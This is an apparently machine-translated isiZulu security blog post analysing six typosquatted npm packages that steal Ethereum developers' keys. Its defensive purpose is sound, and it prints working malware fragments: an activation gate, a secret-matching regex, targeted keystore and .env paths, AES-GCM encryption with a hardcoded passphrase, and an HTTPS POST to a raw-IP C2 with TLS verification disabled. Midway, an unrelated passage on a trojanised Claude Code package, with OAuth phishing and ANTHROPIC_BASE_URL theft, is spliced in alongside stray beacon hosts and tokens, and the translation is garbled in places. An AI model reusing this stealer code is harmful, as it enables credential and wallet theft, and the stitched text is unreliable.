I-EVMDeFi npm Typosquatting Attack Intshontsha Okhiye Bonjiniyela

I-EVM/DeFi npm Typosquatting Attack Steals Developer Keys

TL; DR

Ngomhlaka-6 Meyi 2026, umshicileli oyedwa we-npm, namikazesarada010206, baphoqe amaphakheji ayisithupha anonya ahlose uhlelo lonjiniyela be-Ethereum, Solidity, kanye ne-DeFi.

Amaphakheji, viem-core, viem-utils-core, hardhat-core-utils, evm-utils, foundry-utils, Futhi web3-utils-core, kusetshenziswe amagama anengqondo aklanyelwe ukubukeka njengamalabhulali abasizi bethuluzi elidumile le-Web3.

Wonke amaphakheji ayisithupha ayequkethe okufanayo telemetry.js ifayela. Ifayela lalifana nge-byte kulo lonke iqembu, ne-SHA-256:

I-SHA-256 71426e93cb6143052d5aeeca920850f8a0343c95bc65aab9a15145848cc5bff1

I-malware ayisebenzi ngesikhathi sokufakwa. Akukho preinstall or postinstall i-hook. Kunalokho, iyasebenza uma iphakheji ingeniswa nge require().

Leyo mininingwane ibalulekile.

I-implant ilinda kuze kube yilapho unjiniyela esebenzisa iphakheji ngempela. Bese ihlola ukuthi indawo yokusebenza ibukeka njengendawo yangempela yokuthuthukiswa kwe-Ethereum / Solidity. Ifuna okhiye be-Alchemy noma be-Infura, okhiye abazimele, ama-mnemonics, okhiye be-deployer, noma isiqondisi sendawo se-Foundry.

Uma umninikhaya efanelana, umenzi wecala uqoqa okhiye abayimfihlo be-SSH, izitolo zezikhiye zesikhwama se-Foundry / Geth / Brownie, .env* amafayela, kanye neziguquguquko zemvelo ezibucayi. Ibethela inqwaba nge-AES-256-GCM isebenzisa umushwana wokungena oqinile bese uyikhipha endaweni yokugcina ye-IPv4 C2 eluhlaza lapho ukuqinisekiswa kwe-TLS kukhutshaziwe.

Uhlelo lwe-Xygeni's Malware Early Warning (MEW) luqinisekisile ukuthi wonke amaphakheji ayisithupha anonya. Iphakheji yombiko wokususwa kwerejista ye-npm isalindile.

Iqembu: Amaphakheji Ayisithupha, Umshicileli Oyedwa

I-akhawunti yomshicileli namikazesarada010206 ixhunywe ekhelini le-Gmail elingaqinisekisiwe namikazesarada010206@gmail.com.

Lo mkhankaso uvele njengomagazini wosuku olulodwa ngoMeyi 6, 2026. Wonke amaphakheji ayisithupha ahunyushwe njenge 1.0.0, yayingenazo izixhomekelo zesikhathi sokusebenza, futhi yathumela amafayela amathathu kuphela:

package.json index.js telemetry.js

Baphinde bamemezela indawo yokugcina imithombo efanayo:

https://github.com/harunosakura030303-maker/evmchain-config

Amaphakheji amathathu okuqala abanjwa yizikena ze-MEW ekushicilelweni kokuqala. Amanye amathathu asele aphawulwe ngenkani ngemuva kokubuyekezwa komhlaziyi wephrofayili ye-npm yomshicileli. Uma sekufana ne-byte-identical telemetry.js kwaqinisekiswa kulo lonke iqembu, zavalwa njengezinonya ngenxa yokungaguquguquki.

Iphakheji Inguqulo Kushicilelwe i-npm Ithikithi le-MEW isinqumo
i-viem-core 1.0.0 2026-05-06 01:38:44Z #51049 Unonya
i-viem-utils-core 1.0.0 2026-05-06 #51050 Unonya
i-hardhat-core-utils 1.0.0 2026-05-06 #51051 Unonya
ama-evm-utils 1.0.0 2026-05-06 #51069 Kunonya, ngokungaguquguquki
izinto zokwenziwa kwe-foundry 1.0.0 2026-05-06 #51071 Kunonya, ngokungaguquguquki
i-web3-utils-core 1.0.0 2026-05-06 #51070 Kunonya, ngokungaguquguquki

Isu lokuqamba amagama lilula kodwa liyasebenza.

Lawa maphakheji awazenzi amagama aqondile angenhla. Kunalokho, asebenzisa izijobelelo ezinengqondo "eziwusizo" ezifana nokuthi -core, -utils, Futhi -utils-coreLokho kubenza babukeke njengamalabhulali ahambisanayo unjiniyela angase alindele ukuwabona eduze kwe-Web3 tooling.

Iphakheji Elibi Inhloso Esemthethweni
i-viem-core i-viem, iklayenti elidumile le-Ethereum TypeScript
i-viem-utils-core i-viem
i-hardhat-core-utils hardhat, indawo evamile yokuthuthukiswa kokuqina
ama-evm-utils Isikhala segama se-generic EVM tooling
izinto zokwenziwa kwe-foundry i-foundry, i-Solidity toolchain
i-web3-utils-core ama-web3-utils, abasizi be-Web3.js

Lena iphethini "yephakheji eyengeziwe": hhayi "Ngiyiphakheji yangempela," kodwa "Ngibukeka njengomsizi onengqondo ohambisana nephakheji yangempela."

Kwabathuthukisi beDeFi abashesha kakhulu, lokho kwanele ukudala ingozi.

Kwenzekani Uma Iphakheji Ingenisiwe

Uchungechunge lokuhlasela luncane, luhlosiwe, futhi lugxile ezindaweni zokuthuthukiswa kwe-crypto.

Akukho hoko yokufaka. Esikhundleni salokho, iphakheji ngayinye ifaka index.js othumela ngaphandle ukusebenza kwe-stub bese elayisha imojuli ye-telemetry enonya.

require('./telemetry').init();

Lokhu kusho ukuthi i-malware iyasebenza ekungenisweni kokuqala.

Lokho kuwusizo kakhulu kumhlaseli. Ama-scanner amaningi nama-sandbox agxila ekuziphatheni kwesikhathi sokufaka. Leli phakheji lilinda kuze kube yilapho lisetshenziswa ngempela ngunjiniyela, iskripthi sokwakha, i-test suite, noma indlela yesikhathi sokusebenza.

Isango Lokusebenza: Umlilo Kuphela Ezindaweni Zokusebenza Zonjiniyela Ze-Web3 Zangempela

Ingxenye ebaluleke kakhulu ye-implant yisango lokuqalisa ukusebenza.

I-malware ihlola iziguquguquko zemvelo ezivame ukutholakala kumishini yonjiniyela be-Ethereum / Solidity:

const indicators = [   process.env.ALCHEMY_API_KEY,   process.env.INFURA_KEY,   process.env.PRIVATE_KEY,   process.env.MNEMONIC,   process.env.DEPLOYER_KEY, ].filter(Boolean);

Iphinde ihlole ukuthi i-Foundry ibonakala ifakiwe yini:

fs.existsSync(path.join(os.homedir(), '.foundry'))

Uma kungekho mibandela eyiqiniso, umsebenzi uyabuya futhi awenzi lutho.

Lokho kwenza iphakheji ithule ezindaweni zokuhlaziya ezijwayelekile. Ibhokisi lesanti elingenayo i-Foundry, okhiye be-Alchemy, okhiye be-Infura, okhiye abazimele, noma ama-mnemonics angase abonakale engenangozi.

Kumphathi ofanayo, i-malware ilinda imizuzwana engama-60 kuya kwengama-90 ngaphambi kokuqoqwa:

setTimeout(() => { try { _collect(); } catch {} },           60000 + Math.random() * 30000).unref();

Ukulibaziseka kunciphisa ubudlelwano obusobala phakathi kokungenisa kanye nokukhipha. .unref() I-call iphinde ivumele inqubo ye-Host ukuthi iphume ngokujwayelekile uma iphakheji ingeniswa kuskripthi sesikhashana.

Lokhu akuyona indlela yokuphanga nokubamba enomsindo. Kuyisela eliqondiwe elenzelwe ukugwema ukusebenzisa ngaphandle kokuthi indawo yonjiniyela ifanele ukuntshontshwa.

Lokho Okuqoqa Umntshontshi

Uma isango lokusebenzisa selidlulile, i-malware iqoqa emithonjeni ebaluleke kakhulu ekuthuthukisweni kwe-Web3: okhiye abazimele, izitolo zezikhiye zesikhwama, iziqinisekiso zokuthunyelwa, izimfihlo zamafu, amathokheni e-npm, kanye nokucushwa kwephrojekthi yendawo.

Umthombo Okuqoqwayo
inqubo.env Noma yikuphi ukufanisa okuguquguqukayo /TOKEN|SECRET|KEY|PASS|AUTH|PRIVATE|SEED|MNEMONIC|AWS|NPM|DEPLOY/i
~/.ssh/* Amafayela aqukethe i-PRIVATE KEY noma i-BEGIN OPENSSH, kufaka phakathi okuqukethwe kwefayela eligcwele
~/.foundry/izitolo zokhiye/* Amafayela e-Foundry wallet keystore
~/.ethereum/isitolo sezikhiye/* Amafayela e-Geth wallet keystore
~/.brownie/ama-akhawunti/* Amafayela e-keystore e-Brownie wallet
${cwd}/.env Okuqukethwe kwefayela eligcwele
${cwd}/.env.local Okuqukethwe kwefayela eligcwele
ukukhiqiza kwe-${cwd}/.env Okuqukethwe kwefayela eligcwele
${cwd}/.env.development Okuqukethwe kwefayela eligcwele
igama lomphathi () Imethadatha yomsingathi
crypto.randomUUID() Isihlonzi sesisulu/seseshini
Usuku.manje() Isitembu sesikhathi seqoqo
otheve.beacon.qq.com oth.str.beacon.qq.com h.trace.qq.com

Amathokheni e-ATTA yilawa:

ATTA_ID 00400014144 ATTA_TOKEN 6478159937

Asikwazanga ukuqinisekisa ukuthi i-telemetry yayiyi-analytics yomqhubi noma isiteshi esenziwe imali ngokwehlukile. Amathokheni e-ATTA afana kuzo zombili izibonelo esizihlolile.

Iqembu B: i-heibai

claude.hk I-OAuth Phishing + I-ANTHROPIC_BASE_URL Ukuntshontsha

Isampula yango-Ephreli 1 iyona ebaluleke kakhulu, ingxenye yokuqala yomkhankaso.

heibai:2.1.88-claude.hk-4 yanyatheliswa ngu- wuguoqiangvip28, i-akhawunti eyadalwa ngomhlaka-7 Juni 2025. Iphakheji yazihumusha ngokusobala ngokumelene nesemthethweni 2.1.88 Ukukhululwa kwe-anthropic.

Akukhathazi nge-CA-cert MITM. Kunalokho, iqamba amanga kumsebenzisi mayelana ne-OAuth endpoint.

Izengezo ezinonya eziphezu komthombo we-Claude Code oputshukile zifaka:

Umthombo Okuqoqwayo
inqubo.env Noma yikuphi ukufanisa okuguquguqukayo /TOKEN|SECRET|KEY|PASS|AUTH|PRIVATE|SEED|MNEMONIC|AWS|NPM|DEPLOY/i
~/.ssh/* Amafayela aqukethe i-PRIVATE KEY noma i-BEGIN OPENSSH, kufaka phakathi okuqukethwe kwefayela eligcwele
~/.foundry/izitolo zokhiye/* Amafayela e-Foundry wallet keystore
~/.ethereum/isitolo sezikhiye/* Amafayela e-Geth wallet keystore
~/.brownie/ama-akhawunti/* Amafayela e-keystore e-Brownie wallet
${cwd}/.env Okuqukethwe kwefayela eligcwele
${cwd}/.env.local Okuqukethwe kwefayela eligcwele
ukukhiqiza kwe-${cwd}/.env Okuqukethwe kwefayela eligcwele
${cwd}/.env.development Okuqukethwe kwefayela eligcwele
igama lomphathi () Imethadatha yomsingathi
crypto.randomUUID() Isihlonzi sesisulu/seseshini
Usuku.manje() Isitembu sesikhathi seqoqo

Uhlu oluqondiwe lucacile kakhulu. Lokhu akusikho ukwebiwa kwesiphequluli okuvamile noma ukuskena imininingwane ebanzi. Kuhloselwe onjiniyela abakha, abahlola, abasebenzisa, noma abasebenzisa izinhlelo zokusebenza ze-Ethereum.

Ukufakwa kwezitolo zokhiye ze-Foundry, Geth, kanye ne-Brownie kubaluleke kakhulu. Lawa mafayela angamelela ukufinyelela okuqondile kuma-wallet noma ubunikazi bokuthunyelwa. Uma umhlaseli engakwazi ukuwahlanganisa namaphasiwedi, ama-mnemonics, noma izimfihlo zemvelo, angase akwazi ukuhambisa imali, azenze abathumeli, noma abeke engcupheni imisebenzi yenkontileka ehlakaniphile.

Ukubethela Ngaphambi Kokukhishelwa Ngaphandle

I-malware ibhala ngemfihlo idatha eqoqwe ngaphambi kokuyithumela.

const key = crypto.createHash('sha256').update(K).digest(); const iv = crypto.randomBytes(12); const cipher = crypto.createCipheriv('aes-256-gcm', key, iv);

Iphasiwedi ebhalwe ngekhodi eqinile ithi:

a]3Fk9$mP2xL7vQ8nR4wJ6yB0tH5cE1d

Umthwalo wokugcina ugoqwe njengo-JSON:

{"v":2,"iv":"<base64>","d":"<base64-ciphertext>","t":"<base64-gcm-tag>"}

Ukubethela akukwenzi i-malware ithuthuke kakhulu ngokwayo. Kodwa-ke, kwenza ukuhlolwa kwenethiwekhi kube nzima. Umvikeli obuka ukuphuma uzobona umthwalo we-JSON, kodwa hhayi okhiye abebiwe, amafayela esikhwama semali, noma .env okuqukethwe ngaphandle kwe-password efakwe ikhodi kanye ne-logic yokususa ukubethela.

Ukuphuma ku-Raw IPv4 C2

Indlela yokuphuma inekhodi eqinile:

const req = https.request({   hostname: '76.13.37.80', port: 8443,   path: '/api/v1/telemetry', method: 'POST',   headers: { 'Content-Type': 'application/json', ... },   rejectUnauthorized: false, timeout: 8000, }, () => {});

I-malware ithumela idatha ku:

https://76.13.37.80:8443/api/v1/telemetry

Imininingwane emibili iyagqama.

Okokuqala, i-C2 iyikheli le-IPv4 elingahluziwe kunokuba yisizinda. Lokho kususa isidingo sokubhaliswa kwesizinda futhi kugwema ukutholwa okuthile okusekelwe kusizinda.

Okwesibili, ukuqinisekiswa kwe-TLS kukhutshaziwe nge:

rejectUnauthorized: false

Lokho kuvumela i-malware ukuthi yamukele noma yisiphi isitifiketi, okuhlanganisa nezitifiketi ezizisayinile. Ngamanye amazwi, umhlaseli uthola ukuthuthwa okubethelwe ngaphandle kokudinga isitifiketi somphakathi esivumelekile.

Akukho logic yokuzama kabusha futhi akukho mphathi wokubuyela emuva. Amaphutha agwinywa buthule. Lokhu kugcina iphakheji ithule uma i-C2 ingaxhunyiwe ku-inthanethi noma ingafinyeleleki.

Kungani Lo Mkhankaso Ubalulekile

Amaphakheji amaningi e-npm anonya ahloselwe onjiniyela ukuxosha iziqinisekiso ezibanzi: amathokheni e-npm, okhiye be-AWS, amathokheni e-GitHub, noma .npmrc amafayela.

Lo mkhankaso unciphisa umgomo.

Ifuna izimpawu zokuthi umshini ungowonjiniyela we-Ethereum noma we-Solidity. Bese idonsa ngqo izimpahla ezibalulekile kuleyo ndawo: izitolo zezikhiye zesikhwama, okhiye abazimele, ama-mnemonics, okhiye bokuthumela imali, .env amafayela, kanye nezinkinobho ze-SSH.

Lokho kwenza umkhankaso ube yingozi kakhulu kumaqembu e-Web3 kune-npm stealer ejwayelekile.

Ukutheleleka okuphumelelayo kungaveza:

  • Izikhwama zokuthumela imali
  • Izinkinobho zokuphatha zenkontileka ezihlakaniphile
  • Okhiye bomhlinzeki be-RPC
  • Iziqinisekiso zokuthunyelwa kwefu
  • amathokheni okushicilela e-npm
  • Ukufinyelela kwe-SSH kunjiniyela noma ingqalasizinda yokwakha
  • Izimfihlo zephrojekthi zigcinwe ku .env amafayela
  • Izitolo zezikhiye zesikhwama semali ze-Foundry, Geth, noma Brownie

Amagama ephakheji abonisa nobunjiniyela bezenhlalo obucacile. Aqondisa uhlelo lokusebenza lonjiniyela be-Web3 ngamagama ajwayelekile amathuluzi: viem, hardhat, foundry, evm, Futhi web3.

Umlingisi akudingeki abeke engcupheni amaphrojekthi angempela. Badinga kuphela unjiniyela ukuze afake lokho okubukeka njengephakheji elihambisanayo elifanele.

Izinkomba Zokuvumelana Nokuthola

Amaphakheji kanye nomshicileli
Inkambu Value
umshicileli we-npm namikazesarada010206
I-imeyili yomshicileli namikazesarada010206@gmail.com
I-imeyili iqinisekisiwe Cha
SCM iqinisekisiwe Cha
Isilinganiso sodumo 1.0
Packages viem-core, viem-utils-core, hardhat-core-utils, evm-utils, foundry-utils, web3-utils-core
Izilinganiso Yonke i-1.0.0
Indawo yokugcina imithombo https://github.com/harunosakura030303-maker/evmchain-config
Kuqinisekisiwe ukuthi kunonya Wonke amaphakheji ayisithupha
Network
Uhlobo Value
Iphuzu lokugcina le-C2 https://76.13.37.80:8443/api/v1/telemetry
I-IP ye-C2 76.13.37.80
Imbobo ye-C2 8443/tcp
Ukuziphatha kwe-TLS ukwenqabaOkungagunyaziwe: amanga
Uhlelo lokulayisha inkokhelo {"v":2,"iv": ,"d": ,"t": }
Amafayela nama-Hashes
Uhlobo Value
i-telemetry.js i-SHA-256 71426e93cb6143052d5aeeca920850f8a0343c95bc65aab9a15145848cc5bff1
Ukuhlelwa kwephakheji iphakheji.json, inkomba.js, i-telemetry.js
Inani lamafayela 3
Usayizi olinganiselwayo ophelele 3.4 KB

Izimpawu Zokusebenza

I-malware ihlola lezi ziguquguquko zemvelo:

ALCHEMY_API_KEY INFURA_KEY PRIVATE_KEY MNEMONIC DEPLOYER_KEY

Iphinde ihlole:

~/.foundry/

Izindlela Zokubamba Eziqondiwe

~/.ssh/* ~/.foundry/keystores/* ~/.ethereum/keystore/* ~/.brownie/accounts/* ${cwd}/.env ${cwd}/.env.local ${cwd}/.env.production ${cwd}/.env.development

Iqoqo le-Regex

/TOKEN|SECRET|KEY|PASS|AUTH|PRIVATE|SEED|MNEMONIC|AWS|NPM|DEPLOY/i

Amanothi Okuthola

Imithetho eminingana ithinta lo mkhankaso ngaphandle kokudinga ukuhlaziywa okugcwele kokuziphatha.

Okokuqala, skena amafayela okukhiya ukuze uthole amagama ayisithupha ephakheji enonya:

viem-core viem-utils-core hardhat-core-utils evm-utils foundry-utils web3-utils-core

Noma yikuphi okufanayo ku package-lock.json, yarn.lock, pnpm-lock.yaml, noma node_modules umlando kufanele uphathwe njengesigameko esingathi sína.

Okwesibili, ukuqapha izinqubo ze-Node.js zokufunda izindlela ze-wallet keystore:

~/.foundry/keystores/ ~/.ethereum/keystore/ ~/.brownie/accounts/

Lokhu akuvamile ukuba ukuziphatha okusemthethweni kwephakheji engeniswe njengokusekelwa komsizi. Kuyasolisa ikakhulukazi uma kulandelwa umsebenzi wenethiwekhi ephumayo.

Okwesithathu, vimba noma xwayisa ngokuxhumeka kwe-HTTPS ku:

76.13.37.80:8443

Ikakhulukazi uma indlela yesicelo ingu:

/api/v1/telemetry

Okwesine, funa amaphakheji e-npm ahlanganisa lezi zici:

  • Umshicileli omusha noma onedumela eliphansi
  • I-akhawunti ye-Gmail engaqinisekisiwe
  • Igama lephakheji eliseduze ne-Web3
  • Akukho mlando wokugcina obalulekile
  • Isakhiwo sephakheji esincane
  • index.js elayisha ifayela le-telemetry noma lomsizi
  • Akukho ukuncika kwesikhathi sokusebenza
  • Iqoqo eliguquguqukayo lemvelo elibucayi
  • Ukufinyelela kwesitolo sezikhiye zesikhwama

Le phethini iwusizo kakhulu kune-IOC eyodwa ngoba iphakheji elandelayo ingashintsha ikheli le-IP kodwa igcine i-logic efanayo yokukhomba.

Uhlu Lokuhlola Izimpendulo Zokuyekethisa

Uma unjiniyela esebenzise elinye lamaphakheji ayisithupha futhi indawo yakhe ifana nesango lokuqalisa, phatha indawo yokusebenza njengesengozini.

Lokho kufaka phakathi imishini efakwe i-Foundry, okhiye be-Alchemy noma be-Infura endaweni, okhiye abazimele, ama-mnemonics, noma okhiye bokudiliva.

Impendulo enconyiwe:

  • Nqamula i-host kunethiwekhi.
  • Gcina node_modules, amafayela okukhiya, umlando wegobolondo, kanye namalogi afanele ocwaningo lwezobunhloli.
  • Zungezisa yonke i-SSH keypair ngaphansi kwayo ~/.ssh/.
  • Zungezisa okhiye besikhwama semali kuzo zonke izitolo zezikhiye ezingaphansi ~/.foundry, ~/.ethereum, Futhi ~/.brownie.
  • Thuthela imali ezikhwameni ezintsha.
  • Zungezisa yonke imfihlo egcinwe ku .env* amafayela ezindaweni zokugcina unjiniyela asebenze kuzo.
  • Zungezisa izimfihlo zemvelo ezihambisana ne-regex yeqoqo, okuhlanganisa okhiye be-AWS, ama-token e-npm, ama-token okuhambisa, okhiye be-API, okhiye abazimele, imbewu, kanye nama-mnemonics.
  • Ifu lokuhlola, i-npm, i-GitHub, umhlinzeki we-RPC, kanye nomsebenzi we-blockchain selokhu kwafakwa iphakheji okokuqala.
  • Phinda ucabangele indawo yokusebenza ngaphambi kokusebenzisa kabusha.

Lokho Abavikeli Okufanele Bakususe

Lo mkhankaso ukhombisa ukuthi ukubhala phansi kwe-npm kuthuthuka kanjani ezindaweni zemvelo zonjiniyela ezibiza kakhulu.

Umlingisi wayengadingi ukuphikelela. Babengadingi ukufiphazwa. Babengadingi ngisho nokuqaliswa kwesikhathi sokufakwa.

Kunalokho, bathembele ezintweni ezintathu:

  • Amagama ephakheji ye-Web3 abonakalayo
  • Ukusebenza kuphela emishinini yangempela yokuthuthukisa i-crypto
  • Ukwebiwa okuqondile kwamafayela nezimfihlo ezibaluleke kakhulu kubathuthukisi be-Ethereum

Lokho kwenza umkhankaso ube lula ukuwuphuthelwa ekuskeni okubanzi futhi ube yingozi uma ufika endaweni efanele.

Kumaqembu e-Web3, isifundo sicacile: phatha amagama okuxhomeka njengengxenye yemodeli yakho yokusongela. Iphakheji ebukeka njengomsizi ongenangozi isengaba yindlela emfushane kakhulu yokuyekethisa isikhwama semali.

Kubikwe kurejista ye-npm. Sizobuyekeza lokhu okuthunyelwe uma i-akhawunti yomshicileli namaphakheji sekususiwe.

amathuluzi-we-sca-amathuluzi-okuhlaziya ukwakheka kwesofthiwe
Beka phambili, ulungise, futhi uvikele izingozi zesofthiwe yakho
Thola i-Akhawunti Yakho Yamahhala.
Awekho ikhadi lesikweletu elidingekayo.

Vikela Ukuthuthukiswa Kwesofthiwe Yakho Nokulethwa Kwayo

ne-Xygeni Product Suite